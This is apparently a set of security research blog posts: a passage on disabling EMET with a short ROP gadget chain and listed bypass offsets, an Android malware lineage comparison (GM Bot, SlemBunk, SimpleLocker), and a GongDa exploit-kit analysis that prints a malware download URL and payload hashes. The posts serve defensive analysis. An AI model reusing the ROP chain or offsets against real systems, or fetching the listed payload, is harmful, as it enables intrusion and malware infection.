ADD EBX,EAX # RETN            // EBX = PE header VA + 0x28, the address of the OEP's RVA

XOR EAX,EAX # RETN            // null EAX

ADD EAX,EBP # RETN            // add the previously saved EMET_DLL_BASE to the nulled EAX

ADD EAX,[EBX] # RETN          // add the OEP RVA to EMET_DLL_BASE => EAX = VA of the OEP

XCHG EAX,ECX # RETN           // copy EAX into ECX

XOR EAX,EAX # RETN            // null EAX

ADD EAX,EBP # RETN            // copy EMET_DLL_BASE into EAX

XCHG EAX,ESI # RETN           // copy EMET_DLL_BASE into ESI

// ESI contains EMET_DLL_BASE and ECX contains the OEP address

PUSH ESI # CALL ECX # RETN    // call the OEP of EMET.dll with EMET_DLL_BASE on top of the stack as PARAM1

0x0                           // PARAM2: fdwReason == DLL_PROCESS_DETACH (0)

0x0                           // PARAM3: reserved

// When CALL ECX returns to the RETN instruction, the stack top is as above,
// and all hooks are gone, since EMET.dll just received a DETACH signal

Previous EMET Bypass Techniques

Previous techniques for bypassing EMET protections generally exploited design and implementation flaws, and were possible because some module or API was left out and not secured. We describe a few of these bypass techniques below.

Since LoadLibrary is a critical API, EMET 4.1 raises an exception if it is called via a return or jump instruction, but Jared DeMott showed that calling the LoadLibrary API with a call instruction instead of jumping or returning bypasses EMET's LoadLibrary protection [2].

The LoadLibrary API is monitored in order to prevent loading of UNC paths (e.g., \\evil\bad.dll). Aaron Portnoy showed that this could be bypassed by using the MoveFile API (which is not monitored by EMET 4.0) to download a DLL file that can then be loaded by the LoadLibrary API [3].

Caller check protection in EMET 4.1 is used to prevent ROP gadgets by checking if a critical Windows API has been called with a call instruction, return instruction, or jump instruction – the latter two are widely used in ROP gadgets. DeMott showed a way to bypass caller check protection by executing a legitimate call to the critical API function [2]. Instead of calling VirtualAlloc API directly with a return or jump instruction (which will cause EMET to raise an exception), DeMott used a call instruction to VirtualAlloc API in one of the loaded modules, and by returning to the address of that call instruction, the critical Windows API gets called without having EMET get in the way.

Critical Windows API functions are located in kernel32.dll, ntdll.dll and kernelbase.dll; EMET 3.5 hooked the functions exported by the first two modules, but not those of kernelbase.dll. Shahriyar Jalayeri used this fact to execute the VirtualProtect API located in the kernelbase module to make memory writable and executable [4]. Since EMET 4.0, however, the Deep Hooks protection hooks even the lowest-level critical Windows API functions.

Jalayeri also bypassed EMET by using the _KUSER_SHARED_DATA structure, which has a fixed address, 0x7ffe0000; at offset 0x300 there is a SystemCallStub pointer that points to KiFastSystemCall, the typical way to execute the sysenter instruction. With that, he was able to invoke any system call by specifying its number in the EAX register (e.g., 0x0D7 for ZwProtectVirtualMemory). Additionally, Jalayeri was able to deactivate EMET completely by patching the protection function's prologue with a return instruction to make it ineffective.

EAF protection uses debug registers to place breakpoints on accesses to the export tables of modules such as kernel32.dll, ntdll.dll and kernelbase.dll. These breakpoints can be bypassed by shellcode that resolves APIs through the import address table instead of the export address table (since this protection applies to the export address table only).

Previous EMET Disabling Techniques

Unlike bypasses, which circumvent protections, disabling EMET turns off its protections entirely. For example, EAF (and, partially, EAF+) can be disabled by clearing the hardware breakpoints (i.e., zeroing out the debug registers). Piotr Bania used the undocumented Windows APIs NtSetContextThread and NtContinue to achieve this, but since NtSetContextThread is hooked by EMET, one must first disable other EMET protections to make NtSetContextThread usable [5].

Offensive Security found that most of EMET 4.1 protections first check the value of an exported global variable located at offset 0x0007E220 in emet.dll; if that variable’s value is zero, then the protection body proceeds without interfering with the caller code [6]. It turned out that the global variable is the global switch used to turn on/off EMET protections, and by having that variable in a writable data section, attackers can craft ROP gadgets to zero out that variable easily.

After doing some analysis, we found that EMET v2.1 has the same global switch, located at offset 0xC410. We therefore suspect that this global-switch weakness, with the variable at a fixed address, has existed since the earliest versions of EMET. This remained the case until EMET 5.0 was released.

Offensive Security found that in EMET 5.0, Microsoft moved that global variable onto the heap, within a large structure (i.e., CONFIG_STRUCT) of size 0x560 bytes [7]. However, the same concept still applies, since a pointer to the CONFIG_STRUCT structure is located at the fixed offset 0x0AA84C. As a protection, EMET encodes this pointer value with the EncodePointer function, and every time an EMET protection needs to check the value, it decodes it with the DecodePointer function to get the CONFIG_STRUCT address. Zeroing out CONFIG_STRUCT+0x558 turns off most of EMET's protections. Additionally, to turn off EAF and EAF+, they used unhooked pointers to NtSetContextThread stored at CONFIG_STRUCT+0x518.
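Conceptually, the encode/decode step is just an XOR (and, in Windows' real EncodePointer, a rotate) against a per-process secret, so a leaked heap address alone is not enough. A toy analogue, with made-up values rather than EMET's actual cookie or addresses:

```python
# Simplified analogue of EncodePointer/DecodePointer: XOR the stored pointer
# with a per-process secret. Both values below are invented for illustration.
SECRET_COOKIE = 0x1F2E3D4C  # Windows derives a real per-process value

def encode_pointer(ptr: int) -> int:
    return ptr ^ SECRET_COOKIE

def decode_pointer(enc: int) -> int:
    return enc ^ SECRET_COOKIE

config_struct_addr = 0x02A40560          # hypothetical heap address of CONFIG_STRUCT
stored = encode_pointer(config_struct_addr)
assert decode_pointer(stored) == config_struct_addr
```

The weakness Offensive Security leveraged is that the decoding routine itself lives at a fixed offset in emet.dll, so an attacker never needs to recover the secret; they just call the decoder.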

In EMET 5.1, Offensive Security found that the global variable holds encoded pointer values to another structure (i.e., EMETd), stored at offset 0xF2A30 [8]. The EMETd structure has a pointer field to the CONFIG_STRUCT structure, which holds the global switch at offset CONFIG_STRUCT+0x558; as an additional protection layer on top of pointer encoding, EMET 5.1 uses the cpuid instruction and XORs the returned values with the encoded pointer's values. To decode CONFIG_STRUCT, they used the code at offset 0x67372 of emet.dll, which decodes the EMETd structure and then returns the decoded pointer to CONFIG_STRUCT. Since the global switch (i.e., CONFIG_STRUCT+0x558) is stored in a read-only memory page, Offensive Security found a way to change that by using unhooked pointers stored by EMET at fixed addresses: they used an unhooked pointer to ntdll!NtProtectVirtualMemory stored at CONFIG_STRUCT+0x1b8 to mark the page writable so they could zero out the global switch at CONFIG_STRUCT+0x558. To disable EAF and EAF+, they used the unhooked pointer to NtSetContextThread stored at CONFIG_STRUCT+0x518, just as they did when disabling EMET 5.0.

Conclusion

This new technique uses EMET to unload EMET protections. It is reliable and significantly easier than any previously published EMET disabling or bypassing technique. The entire technique fits within a short, straightforward ROP chain. It only needs to leak the base address of a DLL importing GetModuleHandleW (such as mshtml.dll), instead of full read capabilities over the process space. Since the DllMain function of emet.dll is reachable from the module entry point recorded in its PE header, the bypass does not require hard-coded version-specific offsets, and the technique works for all tested versions of EMET (4.1, 5.1, 5.2, 5.2.0.1).

The inclusion and accessibility of code to disable EMET from within EMET creates a significant new attack vector. Locating DllMain and calling it to shut down all of EMET's protections is significantly easier than bypassing each of EMET's protections as they were designed, and consequently undermines their value.

Special thanks to: Michael Sikorski, Dan Caselden, Corbin Souffrant, Genwei Jiang, and Matthew Graeber.

Appendix

EMET Protections

EMET has evolved through many years, and a brief description of features is provided below:

EMET 1.x, released on October 27, 2009

Structured Exception Handling Overwrite Protection (SEHOP): Provides protection against exception handler overwriting.
Dynamic Data Execution Prevention (DEP): Enforces DEP so data sections such as stack or heap are not executable.
NULL page allocation: Prevents exploitation of null dereferences.
Heap spray allocation: Prevents heap spraying.

EMET 2.x, released on September 2, 2010

Mandatory Address Space Layout Randomization (ASLR): Enforces randomization of module base addresses, even for legacy modules not compiled with the ASLR flag.

Export Address Table Access Filtering (EAF): Normal shellcode (e.g., Metasploit shellcode) iterates over the exported functions of loaded modules to resolve critical Windows API functions, which are normally exported by kernel32.dll, ntdll.dll and kernelbase.dll. EMET uses hardware breakpoints stored in the debug registers (e.g., DR0) to stop any thread that tries to access the export table of these modules, and lets the EMET thread verify whether the access is legitimate.

EMET 3.x, released on May 25, 2012

Imported mitigations from ROPGuard to protect against Return Oriented Programming (ROP).
Load Library Checks: Prevents loading DLL files through Universal Naming Convention (UNC) paths.
ROP Mitigation - Memory protection checks: Protects critical Windows APIs like VirtualProtect, which might be used to mark the stack as executable.
ROP Mitigation - Caller check: Prevents critical Windows APIs from being called with jump or return instructions.
ROP Mitigation - Stack Pivot: Detects if the stack has been pivoted.
ROP Mitigation - Simulate Execution Flow: Simulates execution by manipulating the stack register to see if Windows APIs get called without a call instruction, which EMET considers an indication of ROP gadgets.
Bottom-up ASLR: Adds 8 bits of randomized entropy to the base address of loaded modules.

EMET 4.x, released on April 18, 2013

Deep Hooks: With this feature enabled, EMET is no longer limited to hooking what it considers critical Windows APIs; instead, it also hooks the lowest-level Windows APIs, which the higher-level Windows APIs usually call.

Anti-detours: Because EMET places a jump instruction at the prologue of the detoured (hooked) Windows API functions, attackers can craft a ROP that returns to the instruction that comes after the detour jump instruction. This protection tries to stop these bypasses.

Banned functions: By default it disallows calling ntdll!LdrHotpatchRoutine to prevent DEP/ASLR bypassing. Additional functions can be configured as well.

Certificate Trust (configurable certificate pinning): Provides more checking and verification in the certificate chain trust validation process. By default it supports Internet Explorer only.

EMET 5.x, released on July 31, 2014

Introduced Attack Surface Reduction (ASR): Allows configuring a list of modules to be blocked from loading in certain applications.

EAF+: Similar to EAF, it provides additional functionality in protecting the export table of kernel32.dll, ntdll.dll and kernelbase.dll. It also detects whether the stack pointer points somewhere outside of the stack boundaries or if there is a mismatch between the frame and the stack pointer.

References

[1] "Inside EMET 4.0" by Elias Bachaalany, http://recon.cx/2013/slides/Recon2013-Elias%20Bachaalany-Inside%20EMET%204.pdf
[2] "Bypassing EMET 4.1" by Jared DeMott, http://labs.bromium.com/2014/02/24/bypassing-emet-4-1/
[3] "Bypassing All of The Things" by Aaron Portnoy, https://www.exodusintel.com/files/Aaron_Portnoy-Bypassing_All_Of_The_Things.pdf
[4] "Bypassing EMET 3.5's ROP Mitigations" by Shahriyar Jalayeri, https://github.com/shjalayeri/emet_bypass
[5] "Bypassing EMET Export Address Table Access Filtering feature" by Piotr Bania, http://piotrbania.com/all/articles/anti_emet_eaf.txt
[6] "Disarming Enhanced Mitigation Experience Toolkit (EMET)" by Offensive Security, https://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet/
[7] "Disarming EMET v5.0" by Offensive Security, https://www.offensive-security.com/vulndev/disarming-emet-v5-0/
[8] "Disarming and Bypassing EMET 5.1" by Offensive Security, https://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/

Relational Learning Tutorial


At FireEye, we apply machine learning techniques to a variety of security problems. Malware detection and categorization is a great use of the technology, and we believe that it can also play a role in security challenges that extend beyond malware.

In one such R&D effort, the Innovation & Custom Engineering (ICE) team is utilizing machine learning to build statistical models of relationships between entities. These models can then be used to “connect the dots” by making predictions about relationships we haven’t observed, or to spot anomalous relationships that don’t fit expected patterns.

The most popular application of these algorithms is probably item recommendation, where they are used to personalize our consumer experiences in today’s online marketplace. There are also many important security applications, such as analyzing relationships between threat actors, TTPs, and their targets. Another is detecting attacker activity by modeling relationships between users, machines, applications, and network connections.
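The "connect the dots" idea can be sketched in a few lines of plain Python (no TensorFlow; the data, entities, and rank are invented for illustration): factor an observed relation matrix into low-rank embeddings, then score a pair that was never observed.

```python
import random

def factorize(R, k=2, steps=5000, lr=0.05):
    """Fit R[i][j] ~= dot(U[i], V[j]) by gradient descent on the observed
    entries; None marks unobserved relationships we want to score later."""
    random.seed(0)
    n, m = len(R), len(R[0])
    U = [[random.uniform(-0.1, 0.1) for _ in range(k)] for _ in range(n)]
    V = [[random.uniform(-0.1, 0.1) for _ in range(k)] for _ in range(m)]
    for _ in range(steps):
        for i in range(n):
            for j in range(m):
                if R[i][j] is None:
                    continue
                err = R[i][j] - sum(U[i][f] * V[j][f] for f in range(k))
                for f in range(k):
                    u, v = U[i][f], V[j][f]
                    U[i][f] += lr * err * v
                    V[j][f] += lr * err * u
    return U, V

# Rows are users, columns are internal hosts; 1 = connection observed.
R = [[1, 1,    0],
     [1, None, 0],   # the (user 1, host 1) relationship was never observed
     [0, 0,    1]]
U, V = factorize(R)
score = sum(U[1][f] * V[1][f] for f in range(2))  # converges close to 1
```

Because user 1's observed behavior matches user 0's, the model assigns the unobserved pair a high score, i.e., it predicts the missing link; the same embeddings can be clustered, which is how groupings like Figure 1 are produced.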

Figure 1 shows an example of how these algorithms can also be used for clustering and visualization. This particular model has automatically clustered several thousand machines into groups of similar function, just by observing internal network connection behavior.

Figure 1. Visualization of model-based clustering when trained on network connection relationships

We have created a tutorial that steps through building several types of relational learning models using Python and Google’s new machine learning framework, TensorFlow.  The target audience is machine learning researchers and practitioners, but security professionals who like to channel their inner “data nerd” may also find it interesting!

The tutorial and accompanying code is available as a Jupyter Notebook here.

Lessons from Operation RussianDoll


As defensive security controls raise the bar to attack, attackers will employ increasingly sophisticated techniques to complete their mission. Understanding the mechanics and impact of these threats is essential to systematically discover and deflect the coming wave of advanced attacks.

Mandiant has developed a comprehensive whitepaper that provides a multi-faceted analysis of the "Operation RussianDoll" exploit payload: an exploit for CVE-2015-1701 embedded within the unobfuscated 64-bit RussianDoll payload (MD5: 54656d7ae9f6b89413d5b20704b43b10). The whitepaper references a freely available open-source proof of concept and provides malware triage analysts, reverse engineers, and exploit analysts with tools and background information to recognize and analyze future exploits. It also covers how red team analysts can apply these principles to carve out exploit functionality or augment exploits to produce tools that enhance the effectiveness of security operations.

The whitepaper walks the reader through the payload's actions to understand how to loosely identify what it does once it has gained kernel privilege. It then discusses how to obtain higher-resolution answers from reverse engineering by using WinDbg to confirm assumptions, manipulate control flow, and observe exploit behavior. Building on this and other published sources, a technically detailed exploit analysis is assembled by examining the relevant portions of win32k.sys. Finally, the paper discusses how to extract and augment this exploit to load encrypted, unsigned drivers into the Windows 7 x64 kernel address space.

We hope this analysis will support security professionals' understanding of the malware used by Advanced Persistent Threat (APT) actors and of tools and techniques that may be used to conduct enhanced analysis.

Download the "Lessons from Operation RussianDoll" whitepaper here.

A Growing Number of Android Malware Families Believed to Have a Common Origin: A Study Based on Binary Code


Introduction

On Feb. 19, IBM X-Force researchers released an intelligence report [1] stating that the source code for GM Bot was leaked to a crimeware forum in December 2015. GM Bot is a sophisticated Android malware family that emerged in the Russian-speaking cybercrime underground in late 2014. IBM also claimed that several Android malware families recently described in the security community were actually variants of GM Bot, including Bankosy [2], MazarBot [3], and the SlemBunk malware recently described by FireEye [4, 5].

Security vendors may differ in their definition of a malware “variant.” The term may refer to anything from almost identical code with slight modifications, to code that has superficial similarities (such as similar network traffic) yet is otherwise very different.

Using IBM’s reporting, we compared their GM Bot samples to SlemBunk. Based on the disassembled code of these two families, we agree that there are enough code similarities to indicate that GM Bot shares a common origin with SlemBunk. Interestingly, our research led us to identify an earlier malware family named SimpleLocker – the first known file-encryption ransomware on Android [6] – that also shares a common origin with these banking trojan families.

GM Bot and SlemBunk

Our analysis showed that the four GM Bot samples referenced by IBM researchers all share the same major components as SlemBunk. Figure 1 of our earlier report [4], which shows the major components of SlemBunk and their corresponding class names, is reproduced here:

  • ServiceStarter: An Android receiver that will be invoked once an app is launched or the device boots up. Its functionality is to start the monitoring service, MainService, in the background.
  • MainService: An Android service that runs in the background and monitors all running processes on the device. It prompts the user with an overlay view that resembles the legitimate app when that app is launched. This monitoring service also communicates with a remote host by sending the initial device data and notifying of device status and app preferences.
  • MessageReceiver: An Android receiver that handles incoming text messages. In addition to the functionality of intercepting the authentication code from the bank, this component also acts as the bot client for remote command and control (C2).
  • MyDeviceAdminReceiver: A receiver that requests administrator access to the Android device the first time the app is launched. This makes the app more difficult to remove.
  • Customized UI views: Activity classes that present fake login pages that mimic those of the real banking apps or social apps to phish for banking or social account credentials.

Figure 1. Major components of SlemBunk malware family

The first three GM Bot samples have the same package name as our SlemBunk sample. In addition, the GM Bot samples have five of the same major components, including the same component names, as the SlemBunk sample in Figure 1.

The fourth GM Bot sample has a different initial package name, but unpacks the real payload at runtime. The unpacked payload has the same major components as the SlemBunk sample, with a few minor changes on the class names: MessageReceiver replaced with buziabuzia, and MyDeviceAdminReceiver replaced with MDRA.

Figure 2. Code Structure Comparison between GM Bot and SlemBunk

Figure 2 shows the code structure similarity between one GM Bot sample and one SlemBunk sample (SHA256 9425fca578661392f3b12e1f1d83b8307bfb94340ae797c2f121d365852a775e and SHA256 e072a7a8d8e5a562342121408493937ecdedf6f357b1687e6da257f40d0c6b27 for GM Bot and SlemBunk, respectively). From this figure, we can see that the five major components we discussed in our previous post [4] are also present in GM Bot sample. Other common classes include:

  • Main, the launching activity of both samples.
  • MyApplication, the application class that starts before any other activities of both samples.
  • SDCardServiceStarter, another receiver that monitors the status of MainService and restarts it when it dies.

Among all the above components and classes, MainService is the most critical. It is started by the Main class at launch time, works in the background to monitor the top running process, and overlays a phishing view when a victim app (e.g., a mobile banking app) is recognized. To keep MainService running continuously, the malware authors added two receivers, ServiceStarter and SDCardServiceStarter, that check its status when particular system events are received. Both the GM Bot and SlemBunk samples share this architecture. Figure 3 shows the major code of class SDCardServiceStarter to demonstrate how GM Bot and SlemBunk use the same mechanism to keep MainService running.

Figure 3. Method onReceive of SDCardServiceStarter for GM Bot and SlemBunk

From this figure, we can see that GM Bot and SlemBunk use almost identical code to keep MainService running. Note that both samples check the country in the system locale and avoid starting MainService when they find that the country is Russia. The only difference is that GM Bot applies renaming obfuscation to some classes, methods and fields. For example, the static variable "MainService;->a" in GM Bot plays the same role as the static variable "MainService;->isRunning" in SlemBunk. Malware authors commonly use this trick to make their code harder to understand, but it does not change the fact that the underlying code shares the same origin.

Figure 4 shows the core code of class MainService to demonstrate that GM Bot and SlemBunk actually have the same logic for the main service. In Android, when a service is started, its onCreate method will be called. In the onCreate method of both samples, a static variable is first set to true. In GM Bot, this variable is named “a”, while in SlemBunk it is named “isRunning”. Both then move on to read an app-specific preference. Note that the preferences in both samples have the same name: “AppPrefs”. The last tasks of these two main services are also the same. Specifically, in order to check whether any victim apps are running, a runnable thread is scheduled. If a victim app is running, a phishing view is overlaid on top of that of the victim app. The only difference here is again the naming of the runnable thread: class “d” in GM Bot and class “MainService$2” in SlemBunk are employed to conduct the same credential phishing task.

Figure 4. Class MainService for GM Bot and SlemBunk

In summary, our investigation into the binary code similarities supports IBM’s assertion that GM Bot and SlemBunk share the same origin.
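The kind of structural comparison described above can be approximated programmatically. The following is a minimal, hypothetical sketch that scores the overlap between the sets of class names recovered from two decompiled samples using the Jaccard index; the class-name sets below are illustrative stand-ins, not complete listings from the actual samples.

```python
# Hypothetical sketch: score structural similarity between two decompiled
# APKs by the Jaccard index of their class-name sets. The sets below are
# illustrative, not exhaustive listings from the real samples.
def jaccard(a, b):
    """Jaccard index of two sets: |A & B| / |A | B|."""
    a, b = set(a), set(b)
    return len(a & b) / len(a | b) if a | b else 0.0

slembunk_classes = {"Main", "MyApplication", "MainService",
                    "ServiceStarter", "SDCardServiceStarter",
                    "MessageReceiver", "SmsProcessor"}
gmbot_classes    = {"Main", "MyApplication", "MainService",
                    "ServiceStarter", "SDCardServiceStarter",
                    "MessageReceiver", "a"}  # "a" = renaming obfuscation

score = jaccard(slembunk_classes, gmbot_classes)
print(f"class-name overlap: {score:.2f}")
```

A real comparison would also have to survive renaming obfuscation (as with class “a” above), for example by comparing method-level structure rather than names alone.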

SimpleLocker and SlemBunk

IBM noted that GM Bot emerged in late 2014 in the Russian-speaking cybercrime underground. In our research, we noticed that an earlier piece of Android malware named SimpleLocker also has a code structure similar to SlemBunk and GM Bot. However, SimpleLocker has a different financial incentive: to demand a ransom from the victim. After landing on an Android device, SimpleLocker scans the device for certain file types, encrypts them, and then demands a ransom from the user in order to decrypt the files. Before SimpleLocker’s emergence, there were other types of Android ransomware that would lock the screen; however, SimpleLocker is believed to be the first file-encryption ransomware on Android.

The earliest report on SimpleLocker we identified was published by ESET in June 2014 [6]. However, we found an earlier sample in our malware database from May 2014 (SHA256 edff7bb1d351eafbe2b4af1242d11faf7262b87dfc619e977d2af482453b16cb). The compile date of this app was May 20, 2014. We compared this SimpleLocker sample to one of our SlemBunk samples (SHA256 f3341fc8d7248b3d4e58a3ee87e4e675b5f6fc37f28644a2c6ca9c4d11c92b96) using the same methods used to compare GM Bot and SlemBunk.

Figure 5 shows the code structure comparison between these two samples. Note that this SimpleLocker variant also has the major components ServiceStarter and MainService, both used by SlemBunk. However, the purpose of the main service here is not to monitor running apps and provide phishing UIs to steal banking credentials. Instead, SimpleLocker’s main service component scans the device for victim files and calls the file encryption class to encrypt files and demand a ransom. The major differences in the SimpleLocker code are shown in the red boxes: AesCrypt and FileEncryptor. Other common classes include:

  • Main, the launching activity of both samples.
  • SDCardServiceStarter, another receiver that monitors the status of MainService and restarts it when it dies.
  • Tor and OnionKit, third-party libraries for private communication.
  • TorSender, HttpSender and Utils, supporting classes to provide code for CnC communication and for collecting device information.

Figure 5. Code structure comparison between SimpleLocker and SlemBunk samples

Finally, we located another SimpleLocker sample (SHA256 304efc1f0b5b8c6c711c03a13d5d8b90755cec00cac1218a7a4a22b091ffb30b) from July 2014, about two months after the first SimpleLocker sample. This new sample did not use Tor for private communications, but shared four of the five major components with the SlemBunk sample (SHA256: f3341fc8d7248b3d4e58a3ee87e4e675b5f6fc37f28644a2c6ca9c4d11c92b96). Figure 6 shows the code structure comparison between these two samples.

Figure 6. Code structure comparison between SimpleLocker and SlemBunk variants

As we can see in Figure 6, the new SimpleLocker sample used a packaging mechanism similar to SlemBunk, putting HttpSender and Utils into a sub-package named “utils”. It also added two other major components that were originally only seen in SlemBunk: MessageReceiver and MyDeviceAdminReceiver. In total, this SimpleLocker variant shares four out of five major components with SlemBunk.

Figure 7 shows the major code of MessageReceiver in the previous samples to demonstrate that SimpleLocker and SlemBunk use basically the same process and logic to communicate with the CnC server. First, class MessageReceiver registers itself to handle incoming short messages, whose arrival will trigger its method onReceive. As seen from the figure, the main logic here is basically the same for SimpleLocker and SlemBunk. They first read the value of a particular key from app preferences. Note that the names for the key and shared preference are the same across these two different malware families: the key is named “CHECKING_NUMBER_DONE” and the preference “AppPrefs”. The following steps call method retrieveMessage to retrieve the short messages, and then forward the control flow to class SmsProcessor. The only difference here is that SimpleLocker adds one extra method named processControlCommand to forward control flow.

Class SmsProcessor defines the CnC commands supported by the malware families. Looking into class SmsProcessor, we identified more evidence that SimpleLocker and SlemBunk are of the same origin. First, the CnC commands supported by SimpleLocker are actually a subset of those supported by SlemBunk. In SimpleLocker, CnC commands include "intercept_sms_start", "intercept_sms_stop", "control_number" and "send_sms", all of which are also present in the SlemBunk sample. What is more, in both SimpleLocker and SlemBunk there is a common prefix “#” before the actual CnC command. This kind of peculiarity is a good indicator that SimpleLocker and SlemBunk share a common origin.
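The shared command handling can be restated in a few lines. This is a hedged sketch, not the actual SmsProcessor logic: it only captures the two traits called out above – the fixed command set and the mandatory “#” prefix.

```python
# Hedged re-statement of the shared CnC command handling: a fixed command
# set and a mandatory "#" prefix. The real SmsProcessor is more involved.
COMMANDS = {"intercept_sms_start", "intercept_sms_stop",
            "control_number", "send_sms"}

def dispatch(message):
    """Return the command name if the message is a recognized CnC command."""
    if not message.startswith("#"):
        return None            # ordinary SMS, not a CnC message
    parts = message[1:].split()
    if not parts:
        return None
    cmd = parts[0]
    return cmd if cmd in COMMANDS else None

print(dispatch("#intercept_sms_start"))
print(dispatch("hello"))
```

Idiosyncrasies like the “#” prefix are useful in attribution precisely because independent authors are unlikely to converge on them by accident.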

Figure 7. Class MessageReceiver for SimpleLocker and SlemBunk variants

The task of class MyDeviceAdminReceiver is to request device administrator privilege, which makes these malware families harder to remove. SimpleLocker and SlemBunk are also highly similar in this respect, supporting the same set of device admin relevant functionalities.

At this point, we can see that these variants of SimpleLocker and SlemBunk share four out of five major components and share the same supporting utilities. The only difference is in the final payload, with SlemBunk phishing for banking credentials while SimpleLocker encrypts certain files and demands ransom. This leads us to believe that SimpleLocker came from the same original code base as SlemBunk.

Conclusion

Our analysis confirms that several Android malware families share a common origin, and that the first known file-encrypting ransomware for Android – SimpleLocker – is based on the same code as several banking trojans. Additional research may identify other related malware families.

Individual developers in the cybercrime underground have been proficient in writing and customizing malware. As we have shown, malware with specific and varied purposes can be built on a large base of shared code used for common functions such as gaining administrative privileges, starting and restarting services, and CnC communications. This is apparent simply from looking at known samples related to GM Bot – from SimpleLocker that is used for encryption and ransomware, to SlemBunk that is used as a banking Trojan and for credential theft, to the full-featured MazarBot backdoor.

With the leak of the GM Bot source code, the number of customized Android malware families based on this code will certainly increase. Binary code-based study, one of FireEye Labs’ major research tools, can help us better characterize and track malware families and their relationships, even without direct access to the source code. Fortunately, the similarities across these malware families make them easier to identify, ensuring that FireEye customers are well protected.

References:

[1]. Android Malware About to Get Worse: GM Bot Source Code Leaked
[2]. Android.Bankosy: All ears on voice call-based 2FA
[3]. MazarBOT: Top class Android datastealer
[4]. SLEMBUNK: AN EVOLVING ANDROID TROJAN FAMILY TARGETING USERS OF WORLDWIDE BANKING APPS
[5]. SLEMBUNK PART II: PROLONGED ATTACK CHAIN AND BETTER-ORGANIZED CAMPAIGN
[6]. ESET Analyzes Simplocker – First Android File-Encrypting, TOR-enabled Ransomware


GongDa vs. Korean News

On Jan. 27, we observed visitors to a Korean news site being redirected to the GongDa Exploit Kit (EK), potentially exposing them to malware infection. We will be referring to this site as KNS.

GongDa is an exploit kit that can compromise vulnerable endpoints through the use of exploits, allowing harmful malware to be installed on the system. While GongDa is an older exploit kit that continues to use Java exploits, it has also been found delivering Flash and VBScript exploits. Despite its shortcomings when compared to newer EKs such as Angler or Neutrino, GongDa proves that old tricks (or vulnerabilities) can still work effectively.

ATTACK CHAIN

The attack chain is no different than previous GongDa attacks we’ve seen in the past. A compromised page on the site loads a .js file that redirects to the EK’s landing page.

Figure 1: GongDa EK attack chain

The initial page is the first highlighted request shown in Figure 1. The second request is the .js file jquery-1.3.2.min.js. It has script code injected at the bottom that loads an iframe to sekielec[.]co[.]kr/m/et/ad.html, the EK’s landing page, as shown in Figure 2.

Figure 2: Injected script in the .js leading to GongDa

We observed a number of KNS-owned pages loading the malicious .js file, which redirects to the GongDa landing page “/ad.html”.
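Because the injection is appended to the bottom of a legitimate library file, a simple heuristic is to inspect only the tail of cached .js files for iframe-writing code. The sketch below is illustrative; the regex is a hunting heuristic, not a production signature, and the sample string is a mock-up rather than the actual injected code.

```python
import re

# Illustrative heuristic: flag a JavaScript library whose tail contains
# injected iframe-writing code, as seen with jquery-1.3.2.min.js above.
# The pattern is a hunting aid, not a production signature.
IFRAME_RE = re.compile(r"document\.write\s*\(\s*['\"]<iframe", re.I)

def tail_has_iframe_injection(js_text, tail_bytes=2048):
    """Check only the end of the file, where such code is appended."""
    return bool(IFRAME_RE.search(js_text[-tail_bytes:]))

sample = ("/* jQuery ... minified ... */\n"
          "document.write('<iframe src=\"http://example.test/ad.html\">"
          "</iframe>');")
print(tail_has_iframe_injection(sample))
```

Comparing a cached copy against a known-good hash of the same library version is an even stronger check when one is available.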

From here, “ad.html” loaded:

  • sekielec.co.kr/m/et/swfobject.js
  • sekielec.co.kr/m/et/PnNxKk.html
  • sekielec.co.kr/m/et/jquery.js

EXPLOITS

GongDa has been observed serving the following CVE exploits in recent attacks:

CVE-2011-3544, CVE-2011-2140, CVE-2012-0507, CVE-2012-1723, CVE-2012-1889, CVE-2012-4681, CVE-2012-5076, CVE-2013-0422, CVE-2013-0634 and CVE-2014-6332.

In this particular attack, the landing page probes the target machine and selects an exploit page to deliver to the victim. The exploit page observed in this attack was sekielec.co.kr/m/et/PnNxKk.html. It attempts to trigger CVE-2014-6332, “Windows OLE Automation Array Remote Code Execution Vulnerability”. This is a vulnerability that was patched by Microsoft Security Bulletin MS14-064 in November of 2014. It is a commonly used and dangerous vulnerability that can give an attacker arbitrary command execution on a target system.

The exploit page begins by reversing a string of script code used to start the exploitation process.

Figure 3 shows the before:

Figure 3: Reversed initiation code

And Figure 4 shows the after:

Figure 4: Initiation code

A call to the Create() function leads to a function call to the trigger function Over(), which is shown in Figure 5.


Figure 5: Trigger function Over()

The Over() function is responsible for setting up conditions and corrupting an OLE Automation array object, thus triggering the vulnerability.

Once the vulnerability is triggered, the attacker code can execute commands on the system.

Three variables are assigned, as shown in Figure 6.


Figure 6: Command variables

The first variable (nburl) is a URL to the attacker malware. The second variable (nbExE) is a randomly generated name for the malware that is placed on the system. The third variable (nbnurl) is simply the first variable enclosed in quotes.

nburl: http://smsforu.co.kr/RAD/stat/at.exe

Finally, the attacker code uses these variables and executes the following commands, as shown in Figure 7.

Figure 7: Command beginning

The nbnurl and the nbExE variable are used in the execution of the commands shown in Figure 8.

Figure 8: Command ending

The malicious file is placed in the “%SystemRoot%\system” directory using the nbExE variable described above as a filename.

PAYLOADS

During this GongDa attack we saw the payloads being served from a domain within Korea:

smsforu[.]co[.]kr

With the following filename:

/rad/stat/at.exe

In recent GongDa attacks, we’ve observed payloads such as backdoors, RATs, Trojans, and downloaders.

Some of the MD5’s observed include the following:

  • aac178f775588ca1d42c00d4d95604bd
  • 3d58f4b2008f6d87cab9166c09e513b5
  • a18d1bce5618b23f592dae9133c25229
  • 40be7c9424c6c6de0d560d358a020a5c
  • 808e27fd120ade3ecfb2b21aeda8bc58
  • ed751ce651d685100e00ed133e4e5018
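The hashes above can be folded directly into a triage script. A minimal sketch, assuming you have a file's bytes in hand:

```python
import hashlib

# Minimal triage sketch: hash file contents and compare against the MD5
# IOCs listed above for the GongDa payloads.
IOC_MD5S = {
    "aac178f775588ca1d42c00d4d95604bd",
    "3d58f4b2008f6d87cab9166c09e513b5",
    "a18d1bce5618b23f592dae9133c25229",
    "40be7c9424c6c6de0d560d358a020a5c",
    "808e27fd120ade3ecfb2b21aeda8bc58",
    "ed751ce651d685100e00ed133e4e5018",
}

def md5_matches_ioc(data: bytes) -> bool:
    """True if the MD5 of the given bytes is a known GongDa payload hash."""
    return hashlib.md5(data).hexdigest() in IOC_MD5S

print(md5_matches_ioc(b"benign content"))
```

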